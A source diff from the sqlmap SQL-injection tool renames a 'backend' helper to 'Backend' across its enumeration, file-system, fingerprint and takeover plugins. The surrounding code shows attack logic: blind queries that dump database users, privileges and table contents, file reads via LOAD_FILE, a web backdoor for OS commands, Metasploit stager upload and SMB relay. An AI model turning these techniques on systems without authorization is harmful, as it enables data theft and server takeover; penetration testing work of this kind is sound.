- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.query % (index, queryUser)
else:
query = rootQuery.blind.query % (queryUser, index)
@@ -596,7 +596,7 @@ class Enumeration:
# In PostgreSQL we get 1 if the privilege is True,
# 0 otherwise
- if backend.getIdentifiedDbms() == DBMS.PGSQL and ", " in privilege:
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL and ", " in privilege:
privilege = privilege.replace(", ", ",")
privs = privilege.split(",")
i = 1
@@ -611,12 +611,12 @@ class Enumeration:
# In MySQL >= 5.0 and Oracle we get the list
# of privileges as string
- elif backend.getIdentifiedDbms() == DBMS.ORACLE or ( backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema ):
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE or ( Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema ):
privileges.add(privilege)
# In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
privilege = privilege.replace(", ", ",")
privs = privilege.split(",")
i = 1
@@ -630,7 +630,7 @@ class Enumeration:
i += 1
# In Firebird we get one letter for each privilege
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
privileges.add(firebirdPrivs[privilege.strip()])
if self.__isAdminFromPrivileges(privileges):
@@ -639,7 +639,7 @@ class Enumeration:
# In MySQL < 5.0 we break the cycle after the first
# time we get the user's privileges otherwise we
# duplicate the same query
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
break
if privileges:
@@ -659,14 +659,14 @@ class Enumeration:
return ( kb.data.cachedUsersPrivileges, areAdmins )
def getRoles(self, query2=False):
- warnMsg = "on %s the concept of roles does not " % backend.getIdentifiedDbms()
+ warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms()
warnMsg += "exist. sqlmap will enumerate privileges instead"
logger.warn(warnMsg)
return self.getPrivileges(query2)
def getDbs(self):
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
warnMsg = "information_schema not available, "
warnMsg += "back-end DBMS is MySQL < 5. database "
warnMsg += "names will be fetched from 'mysql' database"
@@ -675,10 +675,10 @@ class Enumeration:
infoMsg = "fetching database names"
logger.info(infoMsg)
- rootQuery = queries[backend.getIdentifiedDbms()].dbs
+ rootQuery = queries[Backend.getIdentifiedDbms()].dbs
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.inband.query2
else:
query = rootQuery.inband.query
@@ -691,7 +691,7 @@ class Enumeration:
infoMsg = "fetching number of databases"
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.count2
else:
query = rootQuery.blind.count
@@ -704,9 +704,9 @@ class Enumeration:
indexRange = getRange(count)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.SYBASE:
+ if Backend.getIdentifiedDbms() == DBMS.SYBASE:
query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ")
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % index
else:
query = rootQuery.blind.query % index
@@ -726,13 +726,13 @@ class Enumeration:
self.forceDbmsEnum()
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
logger.error(errMsg)
bruteForce = True
- elif backend.getIdentifiedDbms() == DBMS.ACCESS:
+ elif Backend.getIdentifiedDbms() == DBMS.ACCESS:
errMsg = "cannot retrieve table names, "
errMsg += "back-end DBMS is Access"
logger.error(errMsg)
@@ -771,7 +771,7 @@ class Enumeration:
infoMsg += " for database '%s'" % conf.db
logger.info(infoMsg)
- rootQuery = queries[backend.getIdentifiedDbms()].tables
+ rootQuery = queries[Backend.getIdentifiedDbms()].tables
if conf.db:
if "," in conf.db:
@@ -789,7 +789,7 @@ class Enumeration:
condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None
if condition:
- if conf.db and backend.getIdentifiedDbms() != DBMS.SQLITE:
+ if conf.db and Backend.getIdentifiedDbms() != DBMS.SQLITE:
if "," in conf.db:
dbs = conf.db.split(",")
query += " WHERE "
@@ -802,12 +802,12 @@ class Enumeration:
infoMsg = "skipping system databases '%s'" % ", ".join(db for db in self.excludeDbsList)
logger.info(infoMsg)
- if backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
query = safeStringFormat(query, conf.db)
value = inject.getValue(query, blind=False)
if value:
- if backend.getIdentifiedDbms() == DBMS.SQLITE:
+ if Backend.getIdentifiedDbms() == DBMS.SQLITE:
if isinstance(value, basestring):
value = [[ DBMS.SQLITE, value ]]
elif isinstance(value, (list, tuple, set)):
@@ -836,7 +836,7 @@ class Enumeration:
infoMsg += "database '%s'" % db
logger.info(infoMsg)
- if backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB):
+ if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB):
query = rootQuery.blind.count
else:
query = rootQuery.blind.count % db
@@ -850,18 +850,18 @@ class Enumeration:
tables = []
- if backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.ORACLE ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.ORACLE ):
plusOne = True
else:
plusOne = False
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.SYBASE:
+ if Backend.getIdentifiedDbms() == DBMS.SYBASE:
query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " "))
- elif backend.getIdentifiedDbms() == DBMS.MAXDB:
+ elif Backend.getIdentifiedDbms() == DBMS.MAXDB:
query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
- elif backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
+ elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.blind.query % index
else:
query = rootQuery.blind.query % (db, index)
@@ -902,13 +902,13 @@ class Enumeration:
conf.db = self.getCurrentDb()
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
logger.error(errMsg)
bruteForce = True
- elif backend.getIdentifiedDbms() == DBMS.ACCESS:
+ elif Backend.getIdentifiedDbms() == DBMS.ACCESS:
errMsg = "cannot retrieve column names, "
errMsg += "back-end DBMS is Access"
logger.error(errMsg)
@@ -959,13 +959,13 @@ class Enumeration:
"37":"VARCHAR"
}
- rootQuery = queries[backend.getIdentifiedDbms()].columns
+ rootQuery = queries[Backend.getIdentifiedDbms()].columns
condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None
infoMsg = "fetching columns "
if conf.col:
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
conf.col = conf.col.upper()
colList = conf.col.split(",")
condQuery = " AND (" + " OR ".join("%s LIKE '%s'" % (condition, "%" + col + "%") for col in colList) + ")"
@@ -978,24 +978,24 @@ class Enumeration:
logger.info(infoMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.inband.query % (conf.tbl, conf.db)
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.inband.query % conf.tbl.upper()
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
query = rootQuery.inband.query % (conf.db, conf.db,
conf.db, conf.db,
conf.db, conf.db,
conf.db, conf.tbl)
query += condQuery.replace("[DB]", conf.db)
- elif backend.getIdentifiedDbms() == DBMS.SQLITE:
+ elif Backend.getIdentifiedDbms() == DBMS.SQLITE:
query = rootQuery.inband.query % conf.tbl
value = inject.getValue(query, blind=False)
- if backend.getIdentifiedDbms() == DBMS.SQLITE:
+ if Backend.getIdentifiedDbms() == DBMS.SQLITE:
parseSqliteTableSchema(value)
elif value:
table = {}
@@ -1018,19 +1018,19 @@ class Enumeration:
infoMsg += " on database '%s'" % conf.db
logger.info(infoMsg)
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.count % (conf.tbl, conf.db)
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.count % conf.tbl.upper()
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
query = rootQuery.blind.count % (conf.db, conf.db, conf.tbl)
query += condQuery.replace("[DB]", conf.db)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.count % (conf.tbl)
query += condQuery
- elif backend.getIdentifiedDbms() == DBMS.SQLITE:
+ elif Backend.getIdentifiedDbms() == DBMS.SQLITE:
query = rootQuery.blind.query % conf.tbl
value = inject.getValue(query, inband=False, error=False)
@@ -1052,22 +1052,22 @@ class Enumeration:
indexRange = getRange(count)
for index in indexRange:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.query % (conf.tbl, conf.db)
query += condQuery
field = None
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.query % (conf.tbl.upper())
query += condQuery
field = None
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
query = rootQuery.blind.query % (conf.db, conf.db,
conf.db, conf.db,
conf.db, conf.db,
conf.tbl)
query += condQuery.replace("[DB]", conf.db)
field = condition.replace("[DB]", conf.db)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.query % (conf.tbl)
query += condQuery
field = None
@@ -1076,20 +1076,20 @@ class Enumeration:
column = inject.getValue(query, inband=False, error=False)
if not onlyColNames:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.query2 % (conf.tbl, column, conf.db)
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.query2 % (conf.tbl.upper(), column)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db,
conf.db, column, conf.db,
conf.db, conf.db, conf.tbl)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.query2 % (conf.tbl, column)
colType = inject.getValue(query, inband=False, error=False)
- if backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ if Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
colType = firebirdTypes[colType] if colType in firebirdTypes else colType
columns[column] = colType
@@ -1135,9 +1135,9 @@ class Enumeration:
conf.db = self.getCurrentDb()
- rootQuery = queries[backend.getIdentifiedDbms()].dump_table
+ rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
if '-' in conf.tbl:
conf.tbl = "`%s`" % conf.tbl
if '-' in conf.db:
@@ -1180,9 +1180,9 @@ class Enumeration:
entriesCount = 0
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.inband.query % (colString, conf.tbl.upper())
- elif backend.getIdentifiedDbms() == DBMS.SQLITE:
+ elif Backend.getIdentifiedDbms() == DBMS.SQLITE:
query = rootQuery.inband.query % (colString, conf.tbl)
else:
query = rootQuery.inband.query % (colString, conf.db, conf.tbl)
@@ -1228,9 +1228,9 @@ class Enumeration:
infoMsg += "on database '%s'" % conf.db
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.count % conf.tbl.upper()
- elif backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
+ elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
query = rootQuery.blind.count % conf.tbl
else:
query = rootQuery.blind.count % (conf.db, conf.tbl)
@@ -1250,14 +1250,14 @@ class Enumeration:
lengths = {}
entries = {}
- if backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MSSQL, DBMS.SYBASE):
+ if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MSSQL, DBMS.SYBASE):
plusOne = True
else:
plusOne = False
indexRange = getRange(count, dump=True, plusOne=plusOne)
try:
- if backend.getIdentifiedDbms() == DBMS.ACCESS:
+ if Backend.getIdentifiedDbms() == DBMS.ACCESS:
validColumnList = False
validPivotValue = False
@@ -1334,22 +1334,22 @@ class Enumeration:
if column not in entries:
entries[column] = []
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.query % (column, conf.db,
conf.tbl, index)
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
query = rootQuery.blind.query % (column, column,
conf.tbl.upper(),
index)
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
query = rootQuery.blind.query % (column, index, conf.db,
conf.tbl, colList[0],
colList[0], colList[0])
- elif backend.getIdentifiedDbms() == DBMS.SQLITE:
+ elif Backend.getIdentifiedDbms() == DBMS.SQLITE:
query = rootQuery.blind.query % (column, conf.tbl, index)
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = rootQuery.blind.query % (index, column, conf.tbl)
value = inject.getValue(query, inband=False, error=False)
@@ -1393,7 +1393,7 @@ class Enumeration:
return kb.data.dumpedTable
def dumpAll(self):
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
raise sqlmapUnsupportedFeatureException, errMsg
@@ -1494,10 +1494,10 @@ class Enumeration:
def searchDb(self):
foundDbs = []
- rootQuery = queries[backend.getIdentifiedDbms()].search_db
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_db
dbList = conf.db.split(",")
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
dbCond = rootQuery.inband.condition2
else:
dbCond = rootQuery.inband.condition
@@ -1522,7 +1522,7 @@ class Enumeration:
dbQuery = dbQuery % db
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.inband.query2
else:
query = rootQuery.inband.query
@@ -1543,7 +1543,7 @@ class Enumeration:
infoMsg += " '%s'" % db
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.count2
else:
query = rootQuery.blind.count
@@ -1563,7 +1563,7 @@ class Enumeration:
indexRange = getRange(count)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.query2
else:
query = rootQuery.blind.query
@@ -1578,12 +1578,12 @@ class Enumeration:
def searchTable(self):
bruteForce = False
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
bruteForce = True
- elif backend.getIdentifiedDbms() == DBMS.ACCESS:
+ elif Backend.getIdentifiedDbms() == DBMS.ACCESS:
errMsg = "cannot retrieve table names, "
errMsg += "back-end DBMS is Access"
logger.error(errMsg)
@@ -1601,7 +1601,7 @@ class Enumeration:
regex = "|".join(conf.tbl.split(","))
return tableExists(paths.COMMON_TABLES, regex)
- rootQuery = queries[backend.getIdentifiedDbms()].search_table
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_table
foundTbls = {}
tblList = conf.tbl.split(",")
tblCond = rootQuery.inband.condition
@@ -1610,7 +1610,7 @@ class Enumeration:
tblConsider, tblCondParam = self.likeOrExact("table")
for tbl in tblList:
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
tbl = tbl.upper()
infoMsg = "searching table"
@@ -1720,12 +1720,12 @@ class Enumeration:
def searchColumn(self):
bruteForce = False
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
bruteForce = True
- elif backend.getIdentifiedDbms() == DBMS.ACCESS:
+ elif Backend.getIdentifiedDbms() == DBMS.ACCESS:
errMsg = "cannot retrieve column names, "
errMsg += "back-end DBMS is Access"
logger.error(errMsg)
@@ -1751,7 +1751,7 @@ class Enumeration:
return
- rootQuery = queries[backend.getIdentifiedDbms()].search_column
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_column
foundCols = {}
dbs = {}
colList = conf.col.split(",")
@@ -1968,7 +1968,7 @@ class Enumeration:
return output
def sqlShell(self):
- infoMsg = "calling %s shell. To quit type " % backend.getIdentifiedDbms()
+ infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms()
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index a9879630a..189443e5e 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -13,7 +13,7 @@ import os
from lib.core.agent import agent
from lib.core.common import dataToOutFile
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomStr
from lib.core.common import readInput
@@ -87,13 +87,13 @@ class Filesystem:
return fileLines
def __checkWrittenFile(self, wFile, dFile, fileType):
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
lengthQuery = "SELECT LENGTH(LOAD_FILE('%s'))" % dFile
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
lengthQuery = "SELECT LENGTH(data) FROM pg_largeobject WHERE loid=%d" % self.oid
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
self.createSupportTbl(self.fileTblName, self.tblField, "text")
# Reference: http://msdn.microsoft.com/en-us/library/ms188365.aspx
@@ -271,7 +271,7 @@ class Filesystem:
fileContent = self.unionReadFile(rFile)
- if fileContent in ( None, "" ) and backend.getIdentifiedDbms() != DBMS.PGSQL:
+ if fileContent in ( None, "" ) and Backend.getIdentifiedDbms() != DBMS.PGSQL:
self.cleanup(onlyFileTbl=True)
return
@@ -289,7 +289,7 @@ class Filesystem:
fileContent = self.__unhexString(fileContent)
rFilePath = dataToOutFile(fileContent)
- if backend.getIdentifiedDbms() != DBMS.PGSQL:
+ if Backend.getIdentifiedDbms() != DBMS.PGSQL:
self.cleanup(onlyFileTbl=True)
return rFilePath
diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py
index fa5aa4802..7ed3e1159 100644
--- a/plugins/generic/fingerprint.py
+++ b/plugins/generic/fingerprint.py
@@ -7,7 +7,7 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import readInput
from lib.core.data import kb
from lib.core.data import logger
@@ -19,7 +19,7 @@ class Fingerprint:
"""
def __init__(self, dbms):
- backend.forceDbms(dbms)
+ Backend.forceDbms(dbms)
def getFingerprint(self):
errMsg = "'getFingerprint' method must be defined "
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index 3b828a47f..695c6053c 100644
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -10,7 +10,7 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.common import getCompiledRegex
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
@@ -57,19 +57,19 @@ class Miscellaneous:
infoMsg = "detecting back-end DBMS version from its banner"
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
first, last = 1, 6
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
first, last = 12, 6
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
first, last = 29, 9
else:
raise sqlmapUnsupportedFeatureException, "unsupported DBMS"
- query = queries[backend.getIdentifiedDbms()].substring.query % (queries[backend.getIdentifiedDbms()].banner.query, first, last)
+ query = queries[Backend.getIdentifiedDbms()].substring.query % (queries[Backend.getIdentifiedDbms()].banner.query, first, last)
if conf.direct:
query = "SELECT %s" % query
@@ -120,7 +120,7 @@ class Miscellaneous:
if not onlyFileTbl:
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
- if backend.getIdentifiedDbms() == DBMS.MSSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL:
return
if udfDict is None:
@@ -133,7 +133,7 @@ class Miscellaneous:
if not output or output in ("y", "Y"):
dropStr = "DROP FUNCTION %s" % udf
- if backend.getIdentifiedDbms() == DBMS.PGSQL:
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL:
inp = ", ".join(i for i in inpRet["input"])
dropStr += "(%s)" % inp
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index 8d07af381..425b8f215 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -9,7 +9,7 @@ See the file 'doc/COPYING' for copying permission
import os
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.common import runningAsAdmin
@@ -45,7 +45,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
def osCmd(self):
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
web = False
- elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
infoMsg = "going to use a web backdoor for command execution"
logger.info(infoMsg)
@@ -66,7 +66,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
def osShell(self):
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
web = False
- elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
infoMsg = "going to use a web backdoor for command prompt"
logger.info(infoMsg)
@@ -149,7 +149,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg += "is unlikely to receive commands send from you"
logger.error(errMsg)
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.sysUdfs.pop("sys_bineval")
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
@@ -159,7 +159,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.initEnv(web=web)
if tunnel == 1:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
@@ -189,7 +189,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.uploadMsfPayloadStager()
if kb.os == "Windows" and conf.privEsc:
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
@@ -207,7 +207,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.uploadIcmpshSlave(web=web)
self.icmpPwn()
- elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
web = True
infoMsg = "going to use a web backdoor to establish the tunnel"
@@ -256,13 +256,13 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
raise sqlmapUnsupportedDBMSException(errMsg)
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
- if backend.getIdentifiedDbms() in ( DBMS.PGSQL, DBMS.MSSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.PGSQL, DBMS.MSSQL ):
errMsg = "on this back-end DBMS it is only possible to "
errMsg += "perform the SMB relay attack if stacked "
errMsg += "queries are supported"
raise sqlmapUnsupportedDBMSException(errMsg)
- elif backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL:
debugMsg = "since stacked queries are not supported, "
debugMsg += "sqlmap is going to perform the SMB relay "
debugMsg += "attack via inference blind SQL injection"
@@ -271,19 +271,19 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
printWarn = True
warnMsg = "it is unlikely that this attack will be successful "
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
warnMsg += "because by default MySQL on Windows runs as "
warnMsg += "Local System which is not a real user, it does "
warnMsg += "not send the NTLM session hash when connecting to "
warnMsg += "a SMB service"
